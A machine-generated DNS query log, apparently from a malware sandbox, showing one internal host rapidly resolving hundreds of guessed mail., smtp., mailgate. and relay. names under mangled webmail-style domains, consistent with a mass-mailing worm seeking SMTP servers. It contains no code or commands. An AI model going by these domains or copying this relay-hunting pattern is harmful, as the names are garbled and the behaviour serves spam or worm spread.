Nov 30, 2023 11:22:46.155931950 CET	192.168.2.4	1.1.1.1	0x715b	Standard query (0)	mailgate.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.156466007 CET	192.168.2.4	1.1.1.1	0x5363	Standard query (0)	mail.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.156466007 CET	192.168.2.4	1.1.1.1	0xb85	Standard query (0)	mail.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.159755945 CET	192.168.2.4	1.1.1.1	0xba7d	Standard query (0)	smtp.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.161233902 CET	192.168.2.4	1.1.1.1	0xd0e9	Standard query (0)	relay.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.161233902 CET	192.168.2.4	1.1.1.1	0x6408	Standard query (0)	mailgate.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.161808014 CET	192.168.2.4	1.1.1.1	0x77b8	Standard query (0)	mailgate.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.165738106 CET	192.168.2.4	1.1.1.1	0x4072	Standard query (0)	relay.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.197778940 CET	192.168.2.4	1.1.1.1	0x69ae	Standard query (0)	relay.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.198659897 CET	192.168.2.4	1.1.1.1	0x44f2	Standard query (0)	mailgate.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.234601021 CET	192.168.2.4	1.1.1.1	0xda2f	Standard query (0)	mail.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.235732079 CET	192.168.2.4	1.1.1.1	0x5176	Standard query (0)	smtp.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.238107920 CET	192.168.2.4	1.1.1.1	0xb7b4	Standard query (0)	relay.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.301368952 CET	192.168.2.4	1.1.1.1	0xf476	Standard query (0)	mailgate.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.302777052 CET	192.168.2.4	1.1.1.1	0x6958	Standard query (0)	mailgate.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.315656900 CET	192.168.2.4	1.1.1.1	0xd089	Standard query (0)	mailgate.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.317523003 CET	192.168.2.4	1.1.1.1	0x710f	Standard query (0)	mail.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.317523003 CET	192.168.2.4	1.1.1.1	0xd713	Standard query (0)	mailgate.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.338026047 CET	192.168.2.4	1.1.1.1	0xc69d	Standard query (0)	mail.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.348076105 CET	192.168.2.4	1.1.1.1	0x7de	Standard query (0)	mailgate.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.351298094 CET	192.168.2.4	1.1.1.1	0x57f7	Standard query (0)	mailgate.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.351298094 CET	192.168.2.4	1.1.1.1	0x60cd	Standard query (0)	relay.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.352920055 CET	192.168.2.4	1.1.1.1	0x6ef	Standard query (0)	relay.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.352920055 CET	192.168.2.4	1.1.1.1	0x1d35	Standard query (0)	relay.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.364808083 CET	192.168.2.4	1.1.1.1	0x6373	Standard query (0)	relay.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.365741968 CET	192.168.2.4	1.1.1.1	0x93ae	Standard query (0)	relay.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.413788080 CET	192.168.2.4	1.1.1.1	0x5796	Standard query (0)	mail.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.413788080 CET	192.168.2.4	1.1.1.1	0x3d58	Standard query (0)	mailgate.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.414402008 CET	192.168.2.4	1.1.1.1	0x85f7	Standard query (0)	smtp.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.420037985 CET	192.168.2.4	1.1.1.1	0x84f4	Standard query (0)	mail.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.420068026 CET	192.168.2.4	1.1.1.1	0x77b8	Standard query (0)	mailgate.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.420068026 CET	192.168.2.4	1.1.1.1	0x5363	Standard query (0)	mail.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.426186085 CET	192.168.2.4	1.1.1.1	0xd2e7	Standard query (0)	relay.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.462815046 CET	192.168.2.4	1.1.1.1	0x68d6	Standard query (0)	relay.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.561557055 CET	192.168.2.4	1.1.1.1	0xf476	Standard query (0)	mailgate.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.562174082 CET	192.168.2.4	1.1.1.1	0x1a6	Standard query (0)	mail.nr.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.568845034 CET	192.168.2.4	1.1.1.1	0xae32	Standard query (0)	relay.yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.569449902 CET	192.168.2.4	1.1.1.1	0xd8e2	Standard query (0)	mailgate.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.641056061 CET	192.168.2.4	1.1.1.1	0x93ae	Standard query (0)	relay.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.641099930 CET	192.168.2.4	1.1.1.1	0x6373	Standard query (0)	relay.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.641647100 CET	192.168.2.4	1.1.1.1	0x7841	Standard query (0)	mailgate.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.644864082 CET	192.168.2.4	1.1.1.1	0xb65d	Standard query (0)	relay.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.646907091 CET	192.168.2.4	1.1.1.1	0xed5	Standard query (0)	relay.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.853579044 CET	192.168.2.4	1.1.1.1	0xb2f7	Standard query (0)	relay.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.862024069 CET	192.168.2.4	1.1.1.1	0xe43d	Standard query (0)	relay.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.895172119 CET	192.168.2.4	1.1.1.1	0x4644	Standard query (0)	relay.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.900933027 CET	192.168.2.4	1.1.1.1	0xd8e2	Standard query (0)	mailgate.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.906054020 CET	192.168.2.4	1.1.1.1	0x7841	Standard query (0)	mailgate.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.918509960 CET	192.168.2.4	1.1.1.1	0xd7d0	Standard query (0)	relay.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.984560013 CET	192.168.2.4	1.1.1.1	0xccba	Standard query (0)	mailgate.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.998816967 CET	192.168.2.4	1.1.1.1	0x39bd	Standard query (0)	smtp.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.002449989 CET	192.168.2.4	1.1.1.1	0x1e92	Standard query (0)	relay.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.003015041 CET	192.168.2.4	1.1.1.1	0x6f63	Standard query (0)	relay.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.003181934 CET	192.168.2.4	1.1.1.1	0x9a1c	Standard query (0)	relay.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.103573084 CET	192.168.2.4	1.1.1.1	0x504f	Standard query (0)	mailgate.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.112059116 CET	192.168.2.4	1.1.1.1	0x2335	Standard query (0)	relay.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.123891115 CET	192.168.2.4	1.1.1.1	0x574f	Standard query (0)	relay.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.129565954 CET	192.168.2.4	1.1.1.1	0x4f6a	Standard query (0)	relay.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.130326986 CET	192.168.2.4	1.1.1.1	0xabe3	Standard query (0)	relay.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.131119967 CET	192.168.2.4	1.1.1.1	0xf8a3	Standard query (0)	relay.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.141046047 CET	192.168.2.4	1.1.1.1	0x6b3	Standard query (0)	smtp.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.144483089 CET	192.168.2.4	1.1.1.1	0x4644	Standard query (0)	relay.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.144483089 CET	192.168.2.4	1.1.1.1	0x9fc2	Standard query (0)	relay.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.144483089 CET	192.168.2.4	1.1.1.1	0xe51d	Standard query (0)	relay.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.144500017 CET	192.168.2.4	1.1.1.1	0x1c2d	Standard query (0)	relay.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.145558119 CET	192.168.2.4	1.1.1.1	0x650d	Standard query (0)	relay.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.150356054 CET	192.168.2.4	1.1.1.1	0xf03c	Standard query (0)	relay.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.153347015 CET	192.168.2.4	1.1.1.1	0x4281	Standard query (0)	relay.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.153496027 CET	192.168.2.4	1.1.1.1	0x4eb2	Standard query (0)	relay.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.153646946 CET	192.168.2.4	1.1.1.1	0x838f	Standard query (0)	relay.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.154333115 CET	192.168.2.4	1.1.1.1	0x2929	Standard query (0)	relay.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.156676054 CET	192.168.2.4	1.1.1.1	0x582b	Standard query (0)	relay.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.161494970 CET	192.168.2.4	1.1.1.1	0xa980	Standard query (0)	mailgate.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.165709972 CET	192.168.2.4	1.1.1.1	0xb7e4	Standard query (0)	relay.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.190721989 CET	192.168.2.4	1.1.1.1	0x5a10	Standard query (0)	relay.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.190922976 CET	192.168.2.4	1.1.1.1	0x84a4	Standard query (0)	relay.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.191459894 CET	192.168.2.4	1.1.1.1	0x6501	Standard query (0)	relay.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.193564892 CET	192.168.2.4	1.1.1.1	0x7c38	Standard query (0)	relay.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.194375992 CET	192.168.2.4	1.1.1.1	0x2f97	Standard query (0)	relay.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.194597006 CET	192.168.2.4	1.1.1.1	0xd05e	Standard query (0)	mail.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.196216106 CET	192.168.2.4	1.1.1.1	0x7a01	Standard query (0)	relay.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.435748100 CET	192.168.2.4	1.1.1.1	0xccba	Standard query (0)	mailgate.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.435818911 CET	192.168.2.4	1.1.1.1	0x6f63	Standard query (0)	relay.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.435818911 CET	192.168.2.4	1.1.1.1	0xf8a3	Standard query (0)	relay.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.435832977 CET	192.168.2.4	1.1.1.1	0x4f6a	Standard query (0)	relay.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.435897112 CET	192.168.2.4	1.1.1.1	0x9fc2	Standard query (0)	relay.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.435897112 CET	192.168.2.4	1.1.1.1	0x6b3	Standard query (0)	smtp.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.436001062 CET	192.168.2.4	1.1.1.1	0xf03c	Standard query (0)	relay.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.436001062 CET	192.168.2.4	1.1.1.1	0x650d	Standard query (0)	relay.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.436001062 CET	192.168.2.4	1.1.1.1	0x1c2d	Standard query (0)	relay.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.436031103 CET	192.168.2.4	1.1.1.1	0xb7e4	Standard query (0)	relay.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.436069012 CET	192.168.2.4	1.1.1.1	0x7a01	Standard query (0)	relay.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.436463118 CET	192.168.2.4	1.1.1.1	0x84a4	Standard query (0)	relay.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.439824104 CET	192.168.2.4	1.1.1.1	0x5a10	Standard query (0)	relay.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.439824104 CET	192.168.2.4	1.1.1.1	0xd05e	Standard query (0)	mail.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.439896107 CET	192.168.2.4	1.1.1.1	0x2f97	Standard query (0)	relay.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.439896107 CET	192.168.2.4	1.1.1.1	0x6501	Standard query (0)	relay.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.439896107 CET	192.168.2.4	1.1.1.1	0x7c38	Standard query (0)	relay.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.442125082 CET	192.168.2.4	1.1.1.1	0xf788	Standard query (0)	smtp.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.447138071 CET	192.168.2.4	1.1.1.1	0x39f0	Standard query (0)	smtp.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.451178074 CET	192.168.2.4	1.1.1.1	0x3a6c	Standard query (0)	relay.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.576317072 CET	192.168.2.4	1.1.1.1	0x70e2	Standard query (0)	relay.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.577923059 CET	192.168.2.4	1.1.1.1	0xcee5	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.581737041 CET	192.168.2.4	1.1.1.1	0x3cbe	Standard query (0)	relay.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.587532043 CET	192.168.2.4	1.1.1.1	0x33f2	Standard query (0)	relay.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.697376966 CET	192.168.2.4	1.1.1.1	0x84fd	Standard query (0)	relay.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.708163977 CET	192.168.2.4	1.1.1.1	0xfeaf	Standard query (0)	relay.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.709763050 CET	192.168.2.4	1.1.1.1	0xc3f6	Standard query (0)	smtp.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.761368036 CET	192.168.2.4	1.1.1.1	0xb0c6	Standard query (0)	smtp.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.816235065 CET	192.168.2.4	1.1.1.1	0x4e09	Standard query (0)	relay.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.817215919 CET	192.168.2.4	1.1.1.1	0x439b	Standard query (0)	relay.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.820828915 CET	192.168.2.4	1.1.1.1	0x9195	Standard query (0)	relay.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.820828915 CET	192.168.2.4	1.1.1.1	0x65c2	Standard query (0)	relay.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.825294018 CET	192.168.2.4	1.1.1.1	0x8bd7	Standard query (0)	relay.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.826195002 CET	192.168.2.4	1.1.1.1	0x497b	Standard query (0)	smtp.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.829176903 CET	192.168.2.4	1.1.1.1	0xf6a6	Standard query (0)	smtp.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.834460020 CET	192.168.2.4	1.1.1.1	0x7670	Standard query (0)	relay.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.835624933 CET	192.168.2.4	1.1.1.1	0xf6dd	Standard query (0)	smtp.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.835624933 CET	192.168.2.4	1.1.1.1	0xe7ac	Standard query (0)	relay.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.863332987 CET	192.168.2.4	1.1.1.1	0xe19b	Standard query (0)	smtp.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.863965034 CET	192.168.2.4	1.1.1.1	0xf6cd	Standard query (0)	relay.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.863965034 CET	192.168.2.4	1.1.1.1	0x11ab	Standard query (0)	relay.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.863965034 CET	192.168.2.4	1.1.1.1	0x72d1	Standard query (0)	relay.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.864708900 CET	192.168.2.4	1.1.1.1	0x77b9	Standard query (0)	relay.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.866096973 CET	192.168.2.4	1.1.1.1	0x693b	Standard query (0)	relay.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.866096973 CET	192.168.2.4	1.1.1.1	0x97c8	Standard query (0)	relay.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.866096973 CET	192.168.2.4	1.1.1.1	0x9422	Standard query (0)	smtp.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.868530989 CET	192.168.2.4	1.1.1.1	0x134a	Standard query (0)	smtp.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.874331951 CET	192.168.2.4	1.1.1.1	0xbcff	Standard query (0)	smtp.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.989938021 CET	192.168.2.4	1.1.1.1	0xfeaf	Standard query (0)	relay.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.001740932 CET	192.168.2.4	1.1.1.1	0xd51	Standard query (0)	relay.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.003703117 CET	192.168.2.4	1.1.1.1	0xba55	Standard query (0)	smtp.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.004944086 CET	192.168.2.4	1.1.1.1	0x5106	Standard query (0)	relay.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.004944086 CET	192.168.2.4	1.1.1.1	0x97ae	Standard query (0)	relay.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.110094070 CET	192.168.2.4	1.1.1.1	0x8b17	Standard query (0)	relay.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.110591888 CET	192.168.2.4	1.1.1.1	0xb161	Standard query (0)	relay.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.110748053 CET	192.168.2.4	1.1.1.1	0x972	Standard query (0)	smtp.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.171386003 CET	192.168.2.4	1.1.1.1	0x6ab5	Standard query (0)	relay.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.171386003 CET	192.168.2.4	1.1.1.1	0xd2fb	Standard query (0)	mailgate.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.171634912 CET	192.168.2.4	1.1.1.1	0xbca5	Standard query (0)	relay.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.200025082 CET	192.168.2.4	1.1.1.1	0x3d9f	Standard query (0)	relay.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.200753927 CET	192.168.2.4	1.1.1.1	0x4c4b	Standard query (0)	smtp.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.200753927 CET	192.168.2.4	1.1.1.1	0xf1a4	Standard query (0)	smtp.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.203423977 CET	192.168.2.4	1.1.1.1	0x78cb	Standard query (0)	smtp.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.203423977 CET	192.168.2.4	1.1.1.1	0xe85f	Standard query (0)	relay.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.205015898 CET	192.168.2.4	1.1.1.1	0xcabf	Standard query (0)	mail.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.205712080 CET	192.168.2.4	1.1.1.1	0x5a9a	Standard query (0)	smtp.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.208333969 CET	192.168.2.4	1.1.1.1	0x221e	Standard query (0)	smtp.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.208333969 CET	192.168.2.4	1.1.1.1	0x362d	Standard query (0)	mail.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.208333969 CET	192.168.2.4	1.1.1.1	0xf4d	Standard query (0)	relay.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.211410046 CET	192.168.2.4	1.1.1.1	0xdb9d	Standard query (0)	mail.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.211410046 CET	192.168.2.4	1.1.1.1	0xb2f7	Standard query (0)	smtp.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.212980986 CET	192.168.2.4	1.1.1.1	0x1a3b	Standard query (0)	smtp.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.213293076 CET	192.168.2.4	1.1.1.1	0xe1cd	Standard query (0)	smtp.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.215677023 CET	192.168.2.4	1.1.1.1	0x2b21	Standard query (0)	relay.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.217251062 CET	192.168.2.4	1.1.1.1	0x1dbe	Standard query (0)	smtp.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.237284899 CET	192.168.2.4	1.1.1.1	0xcb34	Standard query (0)	smtp.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.239566088 CET	192.168.2.4	1.1.1.1	0xe274	Standard query (0)	relay.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.282418966 CET	192.168.2.4	1.1.1.1	0x5106	Standard query (0)	relay.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.282418966 CET	192.168.2.4	1.1.1.1	0xd51	Standard query (0)	relay.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.343581915 CET	192.168.2.4	1.1.1.1	0x4fb6	Standard query (0)	smtp.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.353400946 CET	192.168.2.4	1.1.1.1	0xd916	Standard query (0)	relay.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.358582973 CET	192.168.2.4	1.1.1.1	0xb36d	Standard query (0)	smtp.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.360652924 CET	192.168.2.4	1.1.1.1	0x7b11	Standard query (0)	smtp.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.360652924 CET	192.168.2.4	1.1.1.1	0x7cbf	Standard query (0)	smtp.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.360652924 CET	192.168.2.4	1.1.1.1	0x9ca4	Standard query (0)	smtp.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.360959053 CET	192.168.2.4	1.1.1.1	0x19c5	Standard query (0)	smtp.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.362281084 CET	192.168.2.4	1.1.1.1	0x9a72	Standard query (0)	smtp.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.362281084 CET	192.168.2.4	1.1.1.1	0xe4f7	Standard query (0)	smtp.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.363648891 CET	192.168.2.4	1.1.1.1	0x15f1	Standard query (0)	smtp.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.364080906 CET	192.168.2.4	1.1.1.1	0x7073	Standard query (0)	smtp.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.365267038 CET	192.168.2.4	1.1.1.1	0x2a7f	Standard query (0)	smtp.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.366206884 CET	192.168.2.4	1.1.1.1	0x9d7	Standard query (0)	smtp.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.367682934 CET	192.168.2.4	1.1.1.1	0xb158	Standard query (0)	smtp.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.367682934 CET	192.168.2.4	1.1.1.1	0xd3c1	Standard query (0)	smtp.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.367682934 CET	192.168.2.4	1.1.1.1	0x6ab7	Standard query (0)	smtp.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.368349075 CET	192.168.2.4	1.1.1.1	0xc4e4	Standard query (0)	smtp.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.406305075 CET	192.168.2.4	1.1.1.1	0x8b17	Standard query (0)	relay.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.411710978 CET	192.168.2.4	1.1.1.1	0xc451	Standard query (0)	smtp.qebyte.com	A (IP address)	IN (0x0001)	false
